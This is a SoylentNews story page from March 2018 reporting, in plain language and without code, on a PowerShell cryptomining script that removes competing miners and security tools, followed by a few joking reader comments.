Stories
Slash Boxes
Comments

SoylentNews is people

SoylentNews is powered by your submissions, so send in your scoop. Only 17 submissions in the queue.

Miner Vs Miner: Attack Script Seeks Out And Destroys Competing Currency Crafters

posted by Fnord666 on Wednesday March 07 2018, @06:27PM   Printer-friendly
from the miner-kerfluffle dept.

Arthur T Knackerbracket has found the following story:

Cryptocurrency-mining malware-scum have started to write code that evicts rivals from compromised computers.

The miner in question was first noticed by SANS Internet Storm Center handler Xavier Mertens. Mertens spotted the PowerShell script on March 4, and noting that it kills any other CPU-greedy processes it spots on target machines, he wrote: “The fight for CPU cycles started!”

Pre-infection, the attack script checks whether a target machine is 32-bit or 64-bit and downloads files known to VirusTotal as hpdriver.exe or hpw64 (they're pretending to be HP drivers of some kind).

If successfully installed, the attack then lists running processes and kills any it doesn't like. Mertens noted that alongside ordinary Windows stuff, the list of death-marked processes includes many associated with cryptominers, some of which are listed below.

Mertens wrote that the script also checks for processes associated with security tools.

Original Submission

 
This discussion has been archived. No new comments can be posted.
Miner Vs Miner: Attack Script Seeks Out And Destroys Competing Currency Crafters | Log In/Create an Account | Top | 18 comments | Search Discussion
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

  • (Score: 2) by frojack on Wednesday March 07 2018, @06:54PM (3 children)

    by frojack (1554) on Wednesday March 07 2018, @06:54PM (#649116) Journal

    Well, since its PowerShell we know its windows.

    The fact that both snuck through window's sieve/defense and got installed in the first place, while interesting and instructive, is not central to the question.

    Instead I ask should windows users actually care if one malware manages to kill off another malware?
    That make it easier to eradicate them all, does it not? Let them duke it out, then kill the winner.

    Of course, if the user didn't notice any of these thing sneaking onto his machine in the first place he probably won't notice the battle or the winner.

    --
    No, you are mistaken. I've always had this sig.
    Starting Score:    1  point
    Karma-Bonus Modifier   +1  
    Total Score:   2  

  • (Score: 2) by bob_super on Wednesday March 07 2018, @07:06PM (2 children)

    by bob_super (1357) on Wednesday March 07 2018, @07:06PM (#649119)

    We just need to educate users on how to freeze their CPUs, to make sure all the gorilla miners die?

    • (Score: 2) by Freeman on Wednesday March 07 2018, @07:13PM (1 child)

      by Freeman (732) on Wednesday March 07 2018, @07:13PM (#649122) Journal

      I'm quite sure the average user knows how to place their computer in a freezer. Most of them may not have room in the freezer, though.

      --
      Joshua 1:9 "Be strong and of a good courage; be not afraid, neither be thou dismayed: for the Lord thy God is with thee"

      • (Score: 2) by bob_super on Wednesday March 07 2018, @07:17PM

        by bob_super (1357) on Wednesday March 07 2018, @07:17PM (#649123)

        Not with gorillas inside, obviously.